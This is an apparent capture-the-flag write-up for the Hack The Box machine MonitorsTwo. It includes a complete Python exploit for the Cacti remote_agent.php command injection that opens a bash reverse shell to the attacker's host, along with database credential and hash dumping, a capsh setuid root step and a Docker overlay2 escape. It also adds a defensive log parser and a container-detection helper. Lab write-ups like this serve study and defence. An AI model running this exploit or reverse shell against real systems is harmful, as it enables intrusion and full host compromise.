[HTB] MonitorsTwo

lika

Preface

Rikka is cute. A fairly simple box, a good one for newcomers to try.

Information gathering

nmap

$ sudo nmap -p- --min-rate=10000 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:44 EDT
Nmap scan report for 10.10.11.211
Host is up (0.092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds

$ sudo nmap -sT -sV -sC -O -p22,80 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:45 EDT
Nmap scan report for 10.10.11.211
Host is up (0.075s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds

$ sudo nmap --script=vuln 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:45 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.11.211
Host is up (0.078s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.11.211:80/include/js/dygraph-combined.js?b5b448f71f8c3eb4a39506299bd81b0c=%27%20OR%20sqlspider
| http://10.10.11.211:80/include/js/jquery.tablesorter.pager.js?8ca32d30195c98492cd028f582f07c8c=%27%20OR%20sqlspider
| http://10.10.11.211:80/include/js/d3.js?62b21cab0960a061cb893852bfc74cfa=%27%20OR%20sqlspider
|_ http://10.10.11.211:80/include/js/billboard.js?9a354b4a145f51a33bd39f8e5f042a23=%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /docs/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 241.70 seconds

Ports 22 and 80 are open. Going by the title, 80 is a Cacti login page. Beyond that, the scan turned up a /docs directory worth a look; the "possible SQL injection" hits are clearly not real (they are static .js files with a cache-busting parameter) and can be ignored.

whatweb

$ sudo whatweb 10.10.11.211
http://10.10.11.211 [200 OK] Cacti, Cookies[Cacti], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], HttpOnly[Cacti], IP[10.10.11.211], JQuery, PHP[7.4.33], PasswordField[login_password], Script[text/javascript], Title[Login to Cacti], UncommonHeaders[content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/7.4.33], X-UA-Compatible[IE=Edge], nginx[1.18.0]

The site is PHP-based (PHP 7.4.33), and the nginx build is not current. There may be vulnerabilities there, but the odds of something exploitable are low, so I didn't bother.

nikto

sudo nikto -h 10.10.11.211
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.211
+ Target Hostname: 10.10.11.211
+ Target Port: 80
+ Start Time: 2023-07-18 03:03:35 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/7.4.33.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /install/install.php: Install file found.
+ /help.php: A help file was found.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8881 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2023-07-18 03:16:07 (GMT-4) (752 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto claims to have found quite a few backdoors and file-inclusion issues. None of them are real: the server answers junk requests with a valid response, which nikto itself warns inflates its matches. Move on; there is no point grinding here.

Web exploitation

Service identification

Let's open the page and have a look.


Nothing much: a plain login form. A few weak passwords did not work.

But the footer of the login form tells us this is Cacti, version 1.2.22. A quick Google search turns up the following description of it.

Cacti

Cacti is named after the plant. It is a network-traffic monitoring and graphing tool built on PHP, MySQL, SNMP and RRDTool. It collects data with snmpget and draws graphs with RRDtool, without the user having to learn RRDtool's complicated parameters. It has strong data and user management: each user can be restricted to particular trees, hosts and graphs, authentication can be tied to LDAP, and you can add your own templates. Cacti grew out of making RRDTool easier to use; beyond basic SNMP traffic and system monitoring, it can run external scripts and templates to produce all sorts of monitoring graphs.

So Cacti is PHP software whose main job is to pull data over SNMP, store and update it with rrdtool, and render graphs with rrdtool when a user asks for them. SNMP (collection) and rrdtool (storage and graphing) are therefore the two pillars of Cacti.

That's enough background; let's get to the point and search for a cacti exploit.

Cacti RCE

exploit-db has an RCE exploit for Cacti 1.2.22; I tried it and it did not work. Looking elsewhere, I found an exploit on GitHub that bypasses authentication and gets RCE. The underlying issue is the unauthenticated command injection in remote_agent.php (CVE-2022-46169): the authorization check takes the client address from the X-Forwarded-For header, so a value such as 127.0.0.1 passes, and the poller_id parameter is then interpolated into a shell command for script-based data sources.

import requests
import urllib.parse


def checkVuln():
    # remote_agent.php answers anything other than the "not authorized" error
    # when the X-Forwarded-For value passes its poller-address check
    result = requests.get(vulnURL, headers=header)
    return (result.text != "FATAL: You are not authorized to use this service" and result.status_code == 200)


def bruteForce():
    # brute force to find host id and local data id
    for i in range(1, 5):
        for j in range(1, 10):
            vulnIdURL = f"{vulnURL}?action=polldata&poller_id=1&host_id={i}&local_data_ids[]={j}"
            result = requests.get(vulnIdURL, headers=header)

            if result.text != "[]":
                # print(result.text)
                rrdName = result.json()[0]["rrd_name"]
                # polling_time / uptime are script-based data sources, the code
                # path where poller_id reaches the shell
                if rrdName == "polling_time" or rrdName == "uptime":
                    return True, i, j

    return False, -1, -1


def remoteCodeExecution(payload, idHost, idLocal):
    # poller_id is placed into the command line unsanitised; ';' ends the
    # intended command and our payload follows
    encodedPayload = urllib.parse.quote(payload)
    injectedURL = f"{vulnURL}?action=polldata&poller_id=;{encodedPayload}&host_id={idHost}&local_data_ids[]={idLocal}"

    result = requests.get(injectedURL, headers=header)
    print(result.text)


if __name__ == "__main__":
    targetURL = input("Enter the target address (like 'http://123.123.123.123:8080')")
    vulnURL = f"{targetURL}/remote_agent.php"
    # X-Forwarded-For value should be something in the database of Cacti
    header = {"X-Forwarded-For": "127.0.0.1"}
    print("Checking vulnerability...")
    if checkVuln():
        print("App is vulnerable")
        print("Brute forcing id...")
        isVuln, idHost, idLocal = bruteForce()
        # RCE payload
        ipAddress = input("Enter your IPv4 address")
        port = input("Enter the port you want to listen on")
        payload = f"bash -c 'bash -i >& /dev/tcp/{ipAddress}/{port} 0>&1'"
        if isVuln:
            print("Delivering payload...")
            remoteCodeExecution(payload, idHost, idLocal)
        else:
            print("RRD not found")
    else:
        print("Not vulnerable")

Let's run it.

$ python exp.py
Enter the target address (like 'http://123.123.123.123:8080')http://10.10.11.211
Checking vulnerability...
App is vulnerable
Brute forcing id...
Enter your IPv4 address <YOUR_IP>
Enter the port you want to listen on <YOUR_PORT>
Delivering payload...
<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

The 504 is expected: the injected command is the reverse shell itself, so the PHP request never finishes and nginx times out waiting on the backend. A local nc listener picks up the shell.

$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [HTB_IP] from (UNKNOWN) [10.10.11.211] 49612
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$
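As an added example (not part of the original writeup or of the exploit above), here is the defender's side of the same request: a small parser that runs over nginx access-log lines and flags remote_agent.php requests whose poller_id is not a plain integer, which is the shape of the injection the script sends. The log lines are constructed for the example; the field layout is nginx's default combined format, and the 504 on the hit is the same symptom the exploit run above produced.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed nginx access-log lines in the default "combined" format. They are
# made up for this example: the two remote_agent.php probes mirror what the exploit
# sends (a clean polldata query, then the poller_id command injection).
SAMPLE_LOG = """\
10.10.14.5 - - [18/Jul/2023:06:44:01 +0000] "GET /remote_agent.php HTTP/1.1" 200 43 "-" "python-requests/2.31.0"
10.10.14.5 - - [18/Jul/2023:06:44:02 +0000] "GET /remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 97 "-" "python-requests/2.31.0"
10.10.14.5 - - [18/Jul/2023:06:44:03 +0000] "GET /remote_agent.php?action=polldata&poller_id=;bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.14.5/443%200%3E%261%27&host_id=1&local_data_ids[]=6 HTTP/1.1" 504 167 "-" "python-requests/2.31.0"
10.10.14.7 - - [18/Jul/2023:06:45:00 +0000] "GET /index.php HTTP/1.1" 200 1214 "-" "Mozilla/5.0"
"""

# client ip, timestamp, request line ("METHOD target PROTO"), status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def query_params(query):
    """Split a raw query string into {name: [values]} with percent-decoding.
    Done by hand so that ';' inside a value survives (older parse_qs split on it)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote_plus(value))
    return params


def is_remote_agent_injection(target):
    """A legitimate poller sends poller_id as a small integer. Anything else in a
    remote_agent.php request is an injection attempt (the CVE-2022-46169 shape)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/remote_agent.php"):
        return False
    for value in query_params(parts.query).get("poller_id", []):
        if not re.fullmatch(r"\d+", value):
            return True
    return False


def find_injections(log_text):
    """Return (ip, timestamp, status, decoded request target) for every hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_remote_agent_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("status"),
                         unquote(m.group("target"))))
    return hits


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_LOG):
        print(*hit)
```

Feed it a real access.log (cat access.log | python3 - would need the file read added) and a single hit is enough to act on; a burst of polldata requests walking host_id and local_data_ids, as the brute-force loop does, is the earlier warning sign.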

Privilege escalation

Building an approach

Don't celebrate too early, though. Heading to /home for the user flag, you find it empty. A look at /etc/passwd shows that nobody except root has a shell or a home directory.

www-data@50bca5e748b0:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Why? Look at the hostname (a meaningless 12-character string) and the absence of any other users, and it is not hard to guess that we are inside a Docker container. Our reverse shell came from the Cacti vulnerability; if Cacti is deployed in Docker, then the shell naturally comes out of the container.

So is this shell useless? Not at all. A website has to talk to a backend, and its data generally lives in a database. Ours is a login page, so the database must hold user credentials; if any of them are reused, that is a path to a shell on the outside.
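Added example, not from the original post: the "am I in a container?" check the paragraph above does by eye (odd hostname, no users), written as a function over the usual indicators so it can be run as a one-shot after landing a shell. The sample inputs are constructed; the cgroup id, mount ids and hostname values in them are made up.

```python
import os
import re
import socket


def container_indicators(cgroup_text, mountinfo_text, hostname, dockerenv_exists):
    """Return the list of signs that this shell is inside a container.

    The raw inputs are passed in explicitly so the logic can be run on sample
    data; in_container() below feeds it the live system's values."""
    signs = []
    if dockerenv_exists:
        signs.append("/.dockerenv exists")
    # cgroup v1 paths name the runtime (e.g. 12:pids:/docker/<id>); cgroup v2
    # inside a container often shows only 0::/, so this check alone is not conclusive
    if re.search(r"/(docker|lxc|containerd|kubepods)[/-]", cgroup_text):
        signs.append("cgroup path names a container runtime")
    # mountinfo: "<id> <parent> <maj:min> <root> <mountpoint> <opts> ... - <fstype> <src> <superopts>"
    # a root mount of type overlay is how Docker's overlay2 driver presents the rootfs
    if re.search(r"^\d+ \d+ \S+ / / .*? - overlay ", mountinfo_text, re.M):
        signs.append("root filesystem is an overlay mount")
    # Docker sets the hostname to the first 12 hex digits of the container id
    if re.fullmatch(r"[0-9a-f]{12}", hostname):
        signs.append("hostname looks like a container id")
    return signs


def in_container():
    """Same check against the live system (returns [] on an ordinary host)."""
    def read(path):
        try:
            with open(path) as f:
                return f.read()
        except OSError:
            return ""
    return container_indicators(read("/proc/1/cgroup"), read("/proc/self/mountinfo"),
                                socket.gethostname(), os.path.exists("/.dockerenv"))


# Constructed samples: what a Cacti container like the one above would show,
# versus a plain Ubuntu host. The ids are invented.
SAMPLE_CONTAINER = dict(
    cgroup_text="12:pids:/docker/50bca5e748b0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n",
    mountinfo_text="1234 1233 0:51 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/x\n",
    hostname="50bca5e748b0",
    dockerenv_exists=True,
)
SAMPLE_HOST = dict(
    cgroup_text="0::/user.slice/user-1000.slice/session-3.scope\n",
    mountinfo_text="24 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw\n",
    hostname="monitorstwo",
    dockerenv_exists=False,
)

if __name__ == "__main__":
    print(container_indicators(**SAMPLE_CONTAINER))
    print(container_indicators(**SAMPLE_HOST))
    print(in_container())
```

None of the four indicators is proof on its own (a hardened image can drop /.dockerenv, and cgroup v2 hides the runtime name), which is why the function returns all the signs it found rather than a single yes/no.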

Getting user

With the approach settled, let's execute. How do we find the database? Look at the site's configuration file. A quick search shows Cacti's config lives in include/config.php, so let's read it.

www-data@50bca5e748b0:/var/www/html/include$ cat config.php
cat config.php
<?php
/*
+-------------------------------------------------------------------------+
| Copyright (C) 2004-2020 The Cacti Group |
| |
| This program is free software; you can redistribute it and/or |
| modify it under the terms of the GNU General Public License |
| as published by the Free Software Foundation; either version 2 |
| of the License, or (at your option) any later version. |
| |
| This program is distributed in the hope that it will be useful, |
| but WITHOUT ANY WARRANTY; without even the implied warranty of |
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
| GNU General Public License for more details. |
+-------------------------------------------------------------------------+
| Cacti: The Complete RRDtool-based Graphing Solution |
+-------------------------------------------------------------------------+
| This code is designed, written, and maintained by the Cacti Group. See |
| about.php and/or the AUTHORS file for specific developer information. |
+-------------------------------------------------------------------------+
| http://www.cacti.net/ |
+-------------------------------------------------------------------------+
*/

/*
* Make sure these values reflect your actual database/host/user/password
*/

$database_type = 'mysql';
$database_default = 'cacti';
$database_hostname = 'db';
$database_username = 'root';
$database_password = 'root';
$database_port = '3306';
$database_retries = 5;
$database_ssl = false;
$database_ssl_key = '';
$database_ssl_cert = '';
$database_ssl_ca = '';
$database_persist = false;

/*
* When the cacti server is a remote poller, then these entries point to
* the main cacti server. Otherwise, these variables have no use and
* must remain commented out.
*/

#$rdatabase_type = 'mysql';
#$rdatabase_default = 'cacti';
#$rdatabase_hostname = 'localhost';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port = '3306';
#$rdatabase_retries = 5;
#$rdatabase_ssl = false;
#$rdatabase_ssl_key = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca = '';

The first part of the file has exactly what we want: the database user and password.

So we happily try to log in, and get an error.

www-data@50bca5e748b0:/sbin$ mysql -uroot -p
mysql -uroot -p
Enter password: root
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/run/mysqld/mysqld.sock' (2)

Look closer and the config says $database_hostname = 'db'. The database is not in this container: it runs in a separate container reachable by the hostname db. The error above is the mysql client trying its default, a local Unix socket, which does not exist here. Pass the host explicitly and the login works.

www-data@50bca5e748b0:/sbin$ mysql --host=db -uroot -proot
mysql --host=db -uroot -proot
show databases;
exit
Database
information_schema
cacti
mysql
performance_schema
sys

Once logged in there is another problem: commands produce no output until you exit. The shell we have is not a proper interactive terminal, and there is no python in the container to upgrade it, so we use non-interactive queries instead. Normally everyone uses the interactive client, so I asked ChatGPT how to do it non-interactively.

The -e option does it. Let's start querying:

www-data@50bca5e748b0:/sbin$ mysql --host=db -uroot -proot -e "show tables" cacti
<ysql --host=db -uroot -proot -e "show tables" cacti
Tables_in_cacti
aggregate_graph_templates
aggregate_graph_templates_graph
aggregate_graph_templates_item
aggregate_graphs
aggregate_graphs_graph_item
aggregate_graphs_items
automation_devices
automation_graph_rule_items
automation_graph_rules
automation_ips
automation_match_rule_items
automation_networks
automation_processes
automation_snmp
automation_snmp_items
automation_templates
automation_tree_rule_items
automation_tree_rules
cdef
cdef_items
color_template_items
color_templates
colors
data_debug
data_input
data_input_data
data_input_fields
data_local
data_source_profiles
data_source_profiles_cf
data_source_profiles_rra
data_source_purge_action
data_source_purge_temp
data_source_stats_daily
data_source_stats_hourly
data_source_stats_hourly_cache
data_source_stats_hourly_last
data_source_stats_monthly
data_source_stats_weekly
data_source_stats_yearly
data_template
data_template_data
data_template_rrd
external_links
graph_local
graph_template_input
graph_template_input_defs
graph_templates
graph_templates_gprint
graph_templates_graph
graph_templates_item
graph_tree
graph_tree_items
host
host_graph
host_snmp_cache
host_snmp_query
host_template
host_template_graph
host_template_snmp_query
plugin_config
plugin_db_changes
plugin_hooks
plugin_realms
poller
poller_command
poller_data_template_field_mappings
poller_item
poller_output
poller_output_boost
poller_output_boost_local_data_ids
poller_output_boost_processes
poller_output_realtime
poller_reindex
poller_resource_cache
poller_time
processes
reports
reports_items
sessions
settings
settings_tree
settings_user
settings_user_group
sites
snmp_query
snmp_query_graph
snmp_query_graph_rrd
snmp_query_graph_rrd_sv
snmp_query_graph_sv
snmpagent_cache
snmpagent_cache_notifications
snmpagent_cache_textual_conventions
snmpagent_managers
snmpagent_managers_notifications
snmpagent_mibs
snmpagent_notifications_log
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_domains
user_domains_ldap
user_log
vdef
vdef_items
version

The user_auth table is obviously the interesting one, so query it.

www-data@50bca5e748b0:/sbin$ mysql --host=db -uroot -proot -e "select * from user_auth" cacti
<db -uroot -proot -e "select * from user_auth" cacti
id username password realm full_name email_address must_change_password password_change show_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attempts lastfail reset_perms
1 admin $2y$10$u8Xomk2jjbuJI3MW5TudHeytPPuaWYuNs2S2bTtiD8VW0SIp2TMwe 0 Jamie Thompson admin@monitorstwo.htb on on on on on 2 1 1 1 1 on -1 -1 -1 0 0 663348655
3 guest 43e9a4ab75570f5b 0 Guest Account on on on on on 3 1 1 1 1 1 -1 -1 -1 0 0 0
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.************************ 0 Marcus Brune marcus@monitorstwo.htb on on on on 1 1 1 1 1 on -1 -1 on 0 0 2135691668

That gives us password hashes for three users. Note the formats: admin and marcus are bcrypt ($2y$ with cost factor 10, so slow to brute-force), while guest is a 16-hex-character legacy hash. Drop them into an online hash-lookup site and see.

It returns passwords for guest and marcus, but not admin, so the admin hash goes to john in the meantime. Trying guest and marcus on the website, neither gets in: marcus's password is correct, but the account is told it has no permission.

With that, try SSH. marcus's password logs in successfully.

$ ssh marcus@10.10.11.211
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 18 Jul 2023 08:22:44 AM UTC

System load: 0.02
Usage of /: 63.4% of 6.73GB
Memory usage: 19%
Swap usage: 0%
Processes: 247
Users logged in: 1
IPv4 address for br-60ea49c21773: 172.18.0.1
IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.211


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have mail.
Last login: Tue Jul 18 08:21:07 2023 from 10.10.14.58
marcus@monitorstwo:~$

Grab the user flag from the home directory.

Root

Getting the user flag is nice, but don't overlook the details: for instance, don't get into the habit of clearing the screen the moment you SSH in. The motd says the current user has mail. Mail often leaks information, so it is worth reading; the mail directory is /var/mail.

marcus@monitorstwo:/var/mail$ cat marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team

It greets us with three CVEs. CVE-2021-33033 is a Linux kernel bug; uname -a shows kernel 5.4 here, but Ubuntu backports fixes, so the version string alone does not tell you whether it applies, and kernel exploits are unstable enough that we set it aside. CVE-2020-25706 is a Cacti XSS, no use for privilege escalation. CVE-2021-41091 is in Moby (the upstream project behind Docker Engine), and a search shows it can be used for privilege escalation. There is a PoC on GitHub with detailed instructions, so let's follow it.

CVE-2021-41091

  1. The first step is to get root inside the container and set the setuid bit on its /bin/bash.

    Cleverly, we never closed the earlier reverse shell. Privilege escalation inside the container follows the usual routine: sudo -l gets us nothing, but find / -type f -perm -04000 2>/dev/null comes up with something this time:

    www-data@50bca5e748b0:/var/www/html$ find / -type f -perm -04000 2>/dev/null
    find / -type f -perm -04000 2>/dev/null
    /usr/bin/gpasswd
    /usr/bin/passwd
    /usr/bin/chsh
    /usr/bin/chfn
    /usr/bin/newgrp
    /sbin/capsh
    /bin/mount
    /bin/umount
    /bin/bash
    /bin/su

    capsh stands out as the unfamiliar one; the rest are the usual suspects. Looking capsh up on GTFOBins gives the technique ./capsh --gid=0 --uid=0 --, so let's use it.

    www-data@50bca5e748b0:/var/www/html$ cd /sbin
    cd /sbin
    www-data@50bca5e748b0:/sbin$ ./capsh --gid=0 --uid=0 --
    ./capsh --gid=0 --uid=0 --
    whoami
    root
    chmod u+s /bin/bash
    ls -la /bin/bash
    -rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash

    Step one done.

  2. The second step is to run the exploit. exp.sh can be copied or downloaded straight from GitHub.

    marcus@monitorstwo:/tmp$ ./exp.sh
    [!] Vulnerable to CVE-2021-41091
    [!] Now connect to your Docker container that is accessible and obtain root access !
    [>] After gaining root access execute this command (chmod u+s /bin/bash)

    Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
    [!] Available Overlay2 Filesystems:
    /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
    /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

    [!] Iterating over the available Overlay2 filesystems !
    [?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
    [x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

    [?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
    [!] Rooted !
    [>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
    [?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

    [!] Spawning Shell
    bash-5.1# exit
    marcus@monitorstwo:/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
    marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
    bash-5.1# whoami
    root
    bash-5.1# cd /root
    bash-5.1# ls -la
    total 36
    drwx------ 6 root root 4096 Mar 22 13:21 .
    drwxr-xr-x 19 root root 4096 Mar 22 13:21 ..
    lrwxrwxrwx 1 root root 9 Jan 20 2021 .bash_history -> /dev/null
    -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
    drwx------ 2 root root 4096 Mar 22 13:21 .cache
    drwxr-xr-x 2 root root 4096 Mar 22 13:21 cacti
    drwxr-xr-x 3 root root 4096 Mar 22 13:21 .local
    -rw-r--r-- 1 root root 161 Dec 5 2019 .profile
    -rw-r----- 1 root root 33 Jul 18 05:27 root.txt
    drwx------ 2 root root 4096 Mar 22 13:21 .ssh

